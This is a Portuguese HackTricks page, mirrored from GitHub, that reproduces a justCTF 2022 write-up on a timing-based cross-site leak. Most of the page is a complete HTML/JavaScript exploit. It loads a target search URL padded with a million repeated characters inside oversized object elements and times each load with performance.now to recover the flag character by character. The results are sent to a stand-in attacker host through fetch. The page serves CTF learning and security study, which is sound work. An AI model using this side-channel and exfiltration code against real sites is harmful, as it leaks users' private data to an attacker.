mirror of
https://github.com/carlospolop/hacktricks
synced 2024-12-19 01:24:50 +00:00
134 lines
4.6 KiB
Markdown
134 lines
4.6 KiB
Markdown
|
# performance.now + Force heavy task
|
||
|
|
||
|
{% hint style="success" %}
|
||
|
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Support HackTricks</summary>
|
||
|
|
||
|
* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Compartilhe truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|
||
|
|
||
|
**Exploit retirado de [https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/](https://blog.huli.tw/2022/06/14/en/justctf-2022-xsleak-writeup/)**
|
||
|
|
||
|
Neste desafio, o usuário poderia enviar milhares de caracteres e, se a flag estivesse contida, os caracteres seriam enviados de volta para o bot. Assim, ao colocar uma grande quantidade de caracteres, o atacante poderia medir se a flag estava contida na string enviada ou não.
|
||
|
|
||
|
{% hint style="warning" %}
|
||
|
Inicialmente, eu não defini a largura e altura do objeto, mas depois descobri que é importante porque o tamanho padrão é muito pequeno para fazer diferença no tempo de carregamento.
|
||
|
{% endhint %}
|
||
|
```html
|
||
|
<!DOCTYPE html>
|
||
|
<html>
|
||
|
<head>
|
||
|
|
||
|
</head>
|
||
|
<body>
|
||
|
<img src="https://deelay.me/30000/https://example.com">
|
||
|
<script>
|
||
|
fetch('https://deelay.me/30000/https://example.com')
|
||
|
|
||
|
function send(data) {
|
||
|
fetch('http://vps?data='+encodeURIComponent(data)).catch(err => 1)
|
||
|
}
|
||
|
|
||
|
function leak(char, callback) {
|
||
|
return new Promise(resolve => {
|
||
|
let ss = 'just_random_string'
|
||
|
let url = `http://baby-xsleak-ams3.web.jctf.pro/search/?search=${char}&msg=`+ss[Math.floor(Math.random()*ss.length)].repeat(1000000)
|
||
|
let start = performance.now()
|
||
|
let object = document.createElement('object');
|
||
|
object.width = '2000px'
|
||
|
object.height = '2000px'
|
||
|
object.data = url;
|
||
|
object.onload = () => {
|
||
|
object.remove()
|
||
|
let end = performance.now()
|
||
|
resolve(end - start)
|
||
|
}
|
||
|
object.onerror = () => console.log('Error event triggered');
|
||
|
document.body.appendChild(object);
|
||
|
})
|
||
|
|
||
|
}
|
||
|
|
||
|
send('start')
|
||
|
|
||
|
let charset = 'abcdefghijklmnopqrstuvwxyz_}'.split('')
|
||
|
let flag = 'justCTF{'
|
||
|
|
||
|
async function main() {
|
||
|
let found = 0
|
||
|
let notFound = 0
|
||
|
for(let i=0;i<3;i++) {
|
||
|
await leak('..')
|
||
|
}
|
||
|
for(let i=0; i<3; i++) {
|
||
|
found += await leak('justCTF')
|
||
|
}
|
||
|
for(let i=0; i<3; i++) {
|
||
|
notFound += await leak('NOT_FOUND123')
|
||
|
}
|
||
|
|
||
|
found /= 3
|
||
|
notFound /= 3
|
||
|
|
||
|
send('found flag:'+found)
|
||
|
send('not found flag:'+notFound)
|
||
|
|
||
|
let threshold = found - ((found - notFound)/2)
|
||
|
send('threshold:'+threshold)
|
||
|
|
||
|
if (notFound > found) {
|
||
|
return
|
||
|
}
|
||
|
|
||
|
// exploit
|
||
|
while(true) {
|
||
|
if (flag[flag.length - 1] === '}') {
|
||
|
break
|
||
|
}
|
||
|
for(let char of charset) {
|
||
|
let trying = flag + char
|
||
|
let time = 0
|
||
|
for(let i=0; i<3; i++) {
|
||
|
time += await leak(trying)
|
||
|
}
|
||
|
time/=3
|
||
|
send('char:'+trying+',time:'+time)
|
||
|
if (time >= threshold) {
|
||
|
flag += char
|
||
|
send(flag)
|
||
|
break
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
}
|
||
|
|
||
|
main()
|
||
|
|
||
|
</script>
|
||
|
</body>
|
||
|
|
||
|
</html>
|
||
|
```
|
||
|
{% hint style="success" %}
|
||
|
Aprenda e pratique Hacking AWS:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
|
||
|
Aprenda e pratique Hacking GCP: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
|
||
|
|
||
|
<details>
|
||
|
|
||
|
<summary>Suporte ao HackTricks</summary>
|
||
|
|
||
|
* Confira os [**planos de assinatura**](https://github.com/sponsors/carlospolop)!
|
||
|
* **Junte-se ao** 💬 [**grupo do Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo do telegram**](https://t.me/peass) ou **siga**-nos no **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||
|
* **Compartilhe truques de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
|
||
|
|
||
|
</details>
|
||
|
{% endhint %}
|